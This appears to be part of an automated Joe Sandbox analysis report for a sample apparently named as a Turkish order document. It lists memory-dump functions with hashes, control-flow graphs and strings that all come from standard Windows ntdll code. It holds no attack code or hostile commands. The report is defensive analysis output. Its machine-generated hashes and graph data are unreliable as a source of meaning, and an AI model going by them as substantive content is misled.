                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 30112da89f7e2d4219f5afc80fa1f4a9dae74d0355d5690e4be15c3c7f52eb38
                                                                  • Instruction ID: 8694dd75e29810b045d72b1f9bc352701c033099474c832ea6eec198d8761539
                                                                  • Opcode Fuzzy Hash: 30112da89f7e2d4219f5afc80fa1f4a9dae74d0355d5690e4be15c3c7f52eb38
                                                                  • Instruction Fuzzy Hash: 3F90022925740412D2807258654860A000647D1302F95D416A001963CCC925896D5321
                                                                  Function 32D72D00 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5223b954b3eaaba280592cbc8a27f6309a84394952edd9999c19cdffcfc2a62e
                                                                  • Instruction ID: 5fa085a76832e105cdaac9a5913118466b63eedf2ea381855c3be217c2aeedb5
                                                                  • Opcode Fuzzy Hash: 5223b954b3eaaba280592cbc8a27f6309a84394952edd9999c19cdffcfc2a62e
                                                                  • Instruction Fuzzy Hash: C290022124944852D20076586548A06000647D0305F55D012A1068679DC6358955A131
                                                                  Function 32D72D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f393a8c25ac754877ad0d1cddcf73cfb16cf1583b98c2cca131b8f4fa7be8f1e
                                                                  • Instruction ID: 61904d89d8c86470a96a45fafa1c8c50609af58218ccf6ee87159137ba6d7b7f
                                                                  • Opcode Fuzzy Hash: f393a8c25ac754877ad0d1cddcf73cfb16cf1583b98c2cca131b8f4fa7be8f1e
                                                                  • Instruction Fuzzy Hash: AD90022134540413D24072586558606400697E1301F55D012E0418638CD925895A5222
                                                                  Function 32D72C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                  • Instruction ID: 92b6e349bf0e326a9a16dd91217e36696deabdec1edd5c7f83e1a9be6fb1ff14
                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                  • Instruction Fuzzy Hash:
                                                                  Function 32D72890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 816 32d72890-32d728b3 817 32daa4bc-32daa4c0 816->817 818 32d728b9-32d728cc 816->818 817->818 821 32daa4c6-32daa4ca 817->821 819 32d728ce-32d728d7 818->819 820 32d728dd-32d728df 818->820 819->820 822 32daa57e-32daa585 819->822 823 32d728e1-32d728e5 820->823 821->818 824 32daa4d0-32daa4d4 821->824 822->820 825 32d728eb-32d728fa 823->825 826 32d72988-32d7298e 823->826 824->818 827 32daa4da-32daa4de 824->827 828 32daa58a-32daa58d 825->828 829 32d72900-32d72905 825->829 830 32d72908-32d7290c 826->830 827->818 831 32daa4e4-32daa4eb 827->831 828->830 829->830 830->823 834 32d7290e-32d7291b 830->834 832 32daa4ed-32daa4f4 831->832 833 32daa564-32daa56c 831->833 835 32daa50b 832->835 836 32daa4f6-32daa4fe 832->836 833->818 839 32daa572-32daa576 833->839 837 32d72921 834->837 838 32daa592-32daa599 834->838 841 32daa510-32daa536 call 32d80050 835->841 836->818 840 32daa504-32daa509 836->840 842 32d72924-32d72926 837->842 844 32daa5a1-32daa5c9 call 32d80050 838->844 839->818 843 32daa57c call 32d80050 839->843 840->841 857 32daa55d-32daa55f 841->857 846 32d72993-32d72995 842->846 847 32d72928-32d7292a 842->847 843->857 846->847 851 32d72997-32d729b1 call 32d80050 846->851 853 32d72946-32d72966 call 32d80050 847->853 854 32d7292c-32d7292e 847->854 865 32d72969-32d72974 851->865 853->865 854->853 860 32d72930-32d72944 call 32d80050 854->860 863 32d72981-32d72985 857->863 860->853 865->842 867 32d72976-32d72979 865->867 867->844 868 32d7297f 867->868 868->863
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: f749d5bf8c09e8c615c1d9ad5e021897543d974aef27f1c1b459bcf156511642
                                                                  • Instruction ID: e23a80c72643758d14bc9844932a4d2f2f23da1d1aa719f6a96d5752872962a2
                                                                  • Opcode Fuzzy Hash: f749d5bf8c09e8c615c1d9ad5e021897543d974aef27f1c1b459bcf156511642
                                                                  • Instruction Fuzzy Hash: 4751E9B5A00296AFDB14DF5C889497EF7B8BF08244B548269E494D7741D738DE44CBE0
                                                                  Function 32E0A670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1066 32e0a670-32e0a6e9 call 32d42410 * 2 RtlDebugPrintTimes 1072 32e0a89f-32e0a8c4 call 32d425b0 * 2 call 32d74c30 1066->1072 1073 32e0a6ef-32e0a6fa 1066->1073 1075 32e0a724 1073->1075 1076 32e0a6fc-32e0a709 1073->1076 1077 32e0a728-32e0a734 1075->1077 1079 32e0a70b-32e0a70d 1076->1079 1080 32e0a70f-32e0a715 1076->1080 1083 32e0a741-32e0a743 1077->1083 1079->1080 1081 32e0a7f3-32e0a7f5 1080->1081 1082 32e0a71b-32e0a722 1080->1082 1086 32e0a81f-32e0a821 1081->1086 1082->1077 1087 32e0a745-32e0a747 1083->1087 1088 32e0a736-32e0a73c 1083->1088 1092 32e0a755-32e0a77d RtlDebugPrintTimes 1086->1092 1093 32e0a827-32e0a834 1086->1093 1087->1086 1090 32e0a74c-32e0a750 1088->1090 1091 32e0a73e 1088->1091 1095 32e0a86c-32e0a86e 1090->1095 1091->1083 1092->1072 1106 32e0a783-32e0a7a0 RtlDebugPrintTimes 1092->1106 1096 32e0a836-32e0a843 1093->1096 1097 32e0a85a-32e0a866 1093->1097 1095->1086 1100 32e0a845-32e0a849 1096->1100 1101 32e0a84b-32e0a851 1096->1101 1098 32e0a87b-32e0a87d 1097->1098 1104 32e0a870-32e0a876 1098->1104 1105 32e0a87f-32e0a881 1098->1105 1100->1101 1102 32e0a857 1101->1102 1103 32e0a96b-32e0a96d 1101->1103 1102->1097 1107 32e0a883-32e0a889 1103->1107 1108 32e0a8c7-32e0a8cb 1104->1108 1109 32e0a878 1104->1109 1105->1107 1106->1072 1114 32e0a7a6-32e0a7cc RtlDebugPrintTimes 1106->1114 1111 32e0a8d0-32e0a8f4 RtlDebugPrintTimes 1107->1111 1112 32e0a88b-32e0a89d RtlDebugPrintTimes 1107->1112 1110 32e0a99f-32e0a9a1 1108->1110 1109->1098 1111->1072 1118 32e0a8f6-32e0a913 RtlDebugPrintTimes 1111->1118 1112->1072 1114->1072 1119 32e0a7d2-32e0a7d4 1114->1119 1118->1072 1126 32e0a915-32e0a944 RtlDebugPrintTimes 1118->1126 1120 32e0a7d6-32e0a7e3 1119->1120 1121 32e0a7f7-32e0a80a 1119->1121 1123 32e0a7e5-32e0a7e9 1120->1123 1124 32e0a7eb-32e0a7f1 1120->1124 1125 32e0a817-32e0a819 1121->1125 1123->1124 1124->1081 1124->1121 1127 32e0a81b-32e0a81d 1125->1127 1128 32e0a80c-32e0a812 1125->1128 1126->1072 1132 32e0a94a-32e0a94c 1126->1132 1127->1086 1129 32e0a814 1128->1129 1130 32e0a868-32e0a86a 1128->1130 1129->1125 1130->1095 1133 32e0a972-32e0a985 1132->1133 1134 32e0a94e-32e0a95b 1132->1134 1135 32e0a992-32e0a994 1133->1135 1136 32e0a963-32e0a969 1134->1136 1137 32e0a95d-32e0a961 1134->1137 1138 32e0a996 1135->1138 1139 32e0a987-32e0a98d 1135->1139 1136->1103 1136->1133 1137->1136 1138->1105 1140 32e0a99b-32e0a99d 1139->1140 1141 32e0a98f 1139->1141 1140->1110 1141->1135
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: HEAP:
                                                                  • API String ID: 3446177414-2466845122
                                                                  • Opcode ID: 9b8da84af0f9a998c54c3d36b05a278454c56db9d6cacc13615d54aa3391d4d1
                                                                  • Instruction ID: 10ce394b67a77f99702952d872a30fd51a38e16c38fb91fe4d08dee5224e55fd
                                                                  • Opcode Fuzzy Hash: 9b8da84af0f9a998c54c3d36b05a278454c56db9d6cacc13615d54aa3391d4d1
                                                                  • Instruction Fuzzy Hash: 05A1BC75A043158BD704CE29C896A1AB7E5FB88354F59C92DEA45DB310EB30EC4ACBA1
                                                                  Function 32D67630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1142 32d67630-32d67651 1143 32d67653-32d6766f call 32d3e660 1142->1143 1144 32d6768b-32d67699 call 32d74c30 1142->1144 1149 32da4638 1143->1149 1150 32d67675-32d67682 1143->1150 1154 32da463f-32da4645 1149->1154 1151 32d67684 1150->1151 1152 32d6769a-32d676a9 call 32d67818 1150->1152 1151->1144 1158 32d67701-32d6770a 1152->1158 1159 32d676ab-32d676c1 call 32d677cd 1152->1159 1156 32d676c7-32d676d0 call 32d67728 1154->1156 1157 32da464b-32da46b8 call 32dbf290 call 32d79020 RtlDebugPrintTimes BaseQueryModuleData 1154->1157 1156->1158 1167 32d676d2 1156->1167 1157->1156 1174 32da46be-32da46c6 1157->1174 1162 32d676d8-32d676e1 1158->1162 1159->1154 1159->1156 1169 32d676e3-32d676f2 call 32d6771b 1162->1169 1170 32d6770c-32d6770e 1162->1170 1167->1162 1171 32d676f4-32d676f6 1169->1171 1170->1171 1176 32d67710-32d67719 1171->1176 1177 32d676f8-32d676fa 1171->1177 1174->1156 1178 32da46cc-32da46d3 1174->1178 1176->1177 1177->1151 1179 32d676fc 1177->1179 1178->1156 1181 32da46d9-32da46e4 1178->1181 1180 32da47be-32da47d0 call 32d72c50 1179->1180 1180->1151 1183 32da46ea-32da4723 call 32dbf290 call 32d7aaa0 1181->1183 1184 32da47b9 call 32d74d48 1181->1184 1191 32da473b-32da476b call 32dbf290 1183->1191 1192 32da4725-32da4736 call 32dbf290 1183->1192 1184->1180 1191->1156 1197 32da4771-32da477f call 32d7a770 1191->1197 1192->1158 1200 32da4781-32da4783 1197->1200 1201 32da4786-32da47a3 call 32dbf290 call 32dacf9e 1197->1201 1200->1201 1201->1156 1206 32da47a9-32da47b2 1201->1206 1206->1197 1207 32da47b4 1206->1207 1207->1156
                                                                  Strings
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 32DA46FC
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 32DA4787
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32DA4725
                                                                  • Execute=1, xrefs: 32DA4713
                                                                  • ExecuteOptions, xrefs: 32DA46A0
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 32DA4742
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32DA4655
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  • Opcode ID: 69b62ae524eef089183d8013da70ba647e19dc15c3765c6bc170f77e7551cf8a
                                                                  • Instruction ID: 9f00debcf8b1fcefb21424a91e7c451c30f7dbcf6f411ae433583d2a23ba9b8e
                                                                  • Opcode Fuzzy Hash: 69b62ae524eef089183d8013da70ba647e19dc15c3765c6bc170f77e7551cf8a
                                                                  • Instruction Fuzzy Hash: 1F510B7550025DABFB149AA8EC55FF973B8EF04348F9000A9D505A7390DBB0AA45CF60
                                                                  Function 32D4A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 32D97AE6
                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32D979D5
                                                                  • SsHd, xrefs: 32D4A3E4
                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 32D979D0, 32D979F5
                                                                  • Actx , xrefs: 32D97A0C, 32D97A73
                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32D979FA
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                  • API String ID: 0-1988757188
                                                                  • Opcode ID: 683b08f1e3284677fddee60fcb94cad1dc27c727a118496b842d2bbc52f3150f
                                                                  • Instruction ID: a1d0ab237ddc9435bb0898602e73a8d1bfbaf5da9ec9a9a92ce55945d2b3ac57
                                                                  • Opcode Fuzzy Hash: 683b08f1e3284677fddee60fcb94cad1dc27c727a118496b842d2bbc52f3150f
                                                                  • Instruction Fuzzy Hash: 8FE1A0B56083428FE714CF24C8A5B9A77E1AB88358F504A2DFD99CB390EF31D945CB91
                                                                  Function 32D4D770 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32D99346
                                                                  • GsHd, xrefs: 32D4D874
                                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32D99565
                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 32D99341, 32D99366
                                                                  • Actx , xrefs: 32D99508
                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32D9936B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                  • API String ID: 3446177414-2196497285
                                                                  • Opcode ID: 7974b0f931be17bc78d35d1227151d1e7d86da6996da48087d731a2ab2ab080a
                                                                  • Instruction ID: 9cd5c249687b9de3a333ee5b42bf041b2c8fd7290f6185a91e20ae13fd420ae1
                                                                  • Opcode Fuzzy Hash: 7974b0f931be17bc78d35d1227151d1e7d86da6996da48087d731a2ab2ab080a
                                                                  • Instruction Fuzzy Hash: 01E17A746043428FE714CF64C880B9AB7E4BB88358F454A6DF896CB399DF71E944CB92
                                                                  Function 32DDF525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                  • API String ID: 3446177414-1745908468
                                                                  • Opcode ID: 5d2bf1b13d5cce491c449aef62b2b59ee2f3dc516299d01ffeb9e5667b009c04
                                                                  • Instruction ID: 0479a3eaa0ec488e82ee23e40dd02cddc7c1365abcbf24656fcdd5f690e730ec
                                                                  • Opcode Fuzzy Hash: 5d2bf1b13d5cce491c449aef62b2b59ee2f3dc516299d01ffeb9e5667b009c04
                                                                  • Instruction Fuzzy Hash: FD91CCB6900B80DFEB02CF68C450A99BBF2FF49718F548459E885AB761CB759985CB20
                                                                  Function 32D2645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlDebugPrintTimes.NTDLL ref: 32D2656C
                                                                    • Part of subcall function 32D265B5: RtlDebugPrintTimes.NTDLL ref: 32D26664
                                                                    • Part of subcall function 32D265B5: RtlDebugPrintTimes.NTDLL ref: 32D266AF
                                                                  Strings
                                                                  • LdrpInitShimEngine, xrefs: 32D899F4, 32D89A07, 32D89A30
                                                                  • apphelp.dll, xrefs: 32D26496
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32D89A11, 32D89A3A
                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 32D89A2A
                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 32D89A01
                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 32D899ED
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-204845295
                                                                  • Opcode ID: 192ed3f99e699176a109f7d9effa96baae77d559de4c53071db156edb4b4897d
                                                                  • Instruction ID: 7cda767756edbc2f3fb43c58317b1605267ca795beae6c96b83eb97e9d7f9ebe
                                                                  • Opcode Fuzzy Hash: 192ed3f99e699176a109f7d9effa96baae77d559de4c53071db156edb4b4897d
                                                                  • Instruction Fuzzy Hash: 6251B17164C3049FE314DF24D881F9B77E8EB84748F414919F5D6A73A0DA70E985CBA2
                                                                  Function 32DAFD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                  • API String ID: 3446177414-4227709934
                                                                  • Opcode ID: b8077ca55f14ff8c14284dc818bd4750e13a10b5cf17011a99834371149492dd
                                                                  • Instruction ID: b4d8ecc3ca7ab7689387440e983162c5c7aae880f7f44d63180ccf26d0ba2978
                                                                  • Opcode Fuzzy Hash: b8077ca55f14ff8c14284dc818bd4750e13a10b5cf17011a99834371149492dd
                                                                  • Instruction Fuzzy Hash: 4A418EB9A01218AFDB01DF99D890EDEBBB5FF48704F110199EC05AB341D772AA51CBA0
                                                                  Function 32DDFD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                  • API String ID: 3446177414-3492000579
                                                                  • Opcode ID: 3ea94c7c11aedcc4c4bd2e53bffcc540ab7528a2c132ba7b7a4aa4fd37ff1288
                                                                  • Instruction ID: 332055ef47fe7f30f513b45b4a2096f9dd1b8f8a8ed4baeb32ea2bbaaaaf6162
                                                                  • Opcode Fuzzy Hash: 3ea94c7c11aedcc4c4bd2e53bffcc540ab7528a2c132ba7b7a4aa4fd37ff1288
                                                                  • Instruction Fuzzy Hash: 7371DD75901B84DFDB02DFA8D4506ADFBF2FF49308F548059E846AB392CB709985CB60
                                                                  Function 32D265B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • LdrpLoadShimEngine, xrefs: 32D89ABB, 32D89AFC
                                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32D89AF6
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32D89AC5, 32D89B06
                                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32D89AB4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-3589223738
